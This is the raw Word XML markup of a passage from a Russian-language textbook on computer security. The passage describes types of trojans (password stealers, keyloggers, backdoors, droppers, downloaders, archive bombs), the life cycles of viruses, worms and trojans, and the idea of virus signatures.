          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных сетей</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bookmarkStart w:id="138" w:name="bookmark7"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="420"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Трояны</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="211"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Троян </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(троянский конь) - тип вредоносных программ, основной целью которых является вредоносное воздействие по отношению к компьютерной системе. Трояны отличаются отсутствием механизма создания собственных к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Некоторые трояны способны к автономному преодолению систем защиты КС, с целью проникновения и заражения системы. В общем случае, троян попадает в систему вместе с вирусом либо червем, в результате неосмотрител</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных действий пользователя или же активных действий злоумышленника. Наиболее распространены следующие виды троянов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Похитители паролей </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-PSW) - трояны, также предназначе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные для получения паролей, но не использующие слежение за клавиатурой. Обычно в таких троянах реализованы способы извлечения паролей из файлов, в которых эти пароли хранятся различными приложениями</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Клавиатурные шпионы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-SPY) - трояны, постоянно нах</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дящиеся в памяти и сохраняющие все данные поступающие от клавиатуры с целью последующей передачи этих данных злоумышленнику. Обычно, таким образом, злоумышленник пытается узнать пароли или другую конфиденциал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ную информацию</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Утилиты удаленного управления </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Backdoor)- трояны, обеспеч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вающие полный удаленный контроль над компьютером пользователя. Сущ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствуют легальные утилиты такого же свойства, но они отличаются тем, что с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">общают о своем назначении при установке или же снабжены документацией, в которой описаны их функции. Троянские утилиты удаленного управления, напротив, никак не выдают своего реального назначения, так что пользователь и не подозревает о том, что </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>его компьютер подконтролен злоумышленнику. Наиболее популярная утилита удаленного управления - Back Orifice</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Анонимные smtp-сервера и прокси </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-Proxy) - трояны, в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полняющие функции почтовых серверов или прокси и использующиеся в пе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вом случае для спам-рассылок, а во втором для заметания следов хакерами</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Модификаторы настроек браузера </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-Cliker) - трояны, кот</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рые меняют стартовую страницу в браузере, страницу поиска или еще какие-либо настройки, для организации несанкционированных обращений к Инте</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нет-ресурсам</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Инсталляторы прочих вредоносных программ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-Dropper) - трояны, представляющие возможность злоумышленнику производить скрытую установку других программ</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Загрузчики вредоносных программ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan Downloader) - трояны, предназначенные для загрузки на компьютер-жертву новых версий вредоно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных программ, или рекламных систем</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Уведомители об успешной атаке </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Trojan-Notifier) - трояны данн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го типа предназначены для сообщения своему «хозяину» о зараженном комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютере</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«Бомбы» в архивах </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(ARCBomb) - трояны, представляющие собой архивы, специально оформленные таким образом, чтобы вызывать нештатное поведение архиваторов при попытке разархивировать данные - зависание или существенное замедление работы компьютера, заполнение диска большим к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>личеством «пустых» данных</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Логические бомбы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- чаще не столько трояны, сколько троянские составляющие червей и вирусов, суть работы которых состоит в том, чтобы при определенных условиях (дата, время суток, действия пользователя, команда извне) произвести определенное действие: например, уничтожение данных</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Утилиты дозвона </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- сравнительно новый тип троянов, представл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ющий собой утилиты dial-ирдоступа в Интернет через платные почтовые слу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бы. Такие трояны прописываются в системе как утилиты дозвона по умолч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нию и влекут за собой крупные счета за пользование Интернетом</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bookmarkStart w:id="139" w:name="bookmark8"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="420"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Жизненный цикл вредоносных программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс размножения вирусов может быть условно разделен на нескол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко стадий:</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Активация вируса</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lastRenderedPageBreak/>
        <w:t>Поиск объектов для заражения</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Подготовка вирусных копий</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Внедрение вирусных копий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Так же как для вирусов, жизненный цикл червей можно разделить на определенные стадии:</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Проникновение в систему</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Активация</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Поиск «жертв»</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Подготовка копий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Распространение копий</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">У </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">троянов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вследствие отсутствия функций размножения и распростр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нения, их жизненный цикл меньше чем у вирусов - всего три ст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дии:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проникновение на компьютер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Активация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1191"/>
        </w:tabs>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполнение заложенных функций</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Это, само собой, не означает малого времени жизни троянов. Напротив, троян может незаметно находиться в памяти компьютера длительное время, никак не выдавая своего присутствия, до тех пор, пока не выполнит свою вр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доносную функцию, будет обнаружен антивирусными средствами.</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bookmarkStart w:id="140" w:name="bookmark9"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="420"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные пути проникновения в систему и активации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>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Существует утверждение - любую вредоносную программу пользователь может победить самостоятельно, т. е. не прибегая к использованию антивиру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных программ. Это действительно так, за успешными действия любой антив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русной программы стоит труд вирусных аналитиков, которые по сути дела вручную разбираются с алгоритмами работы новых вирусов, выделяют сигн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>туры, описывают алгоритм работы вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="211"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигнатура вируса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- в широком смысле, информация, позволяющая одн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>значно определить наличие данного вируса в файле или ином коде</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Примерами сигнатур являются: уникальная последовательность байт, присутствующая в данном вирусе и не встречающаяся в других программах; контрольная сумма такой последовательности</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Таким образом, антивирусную программу можно рассматривать как средство автоматизации борьбы с вирусами. Следует заметить, что анализ в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
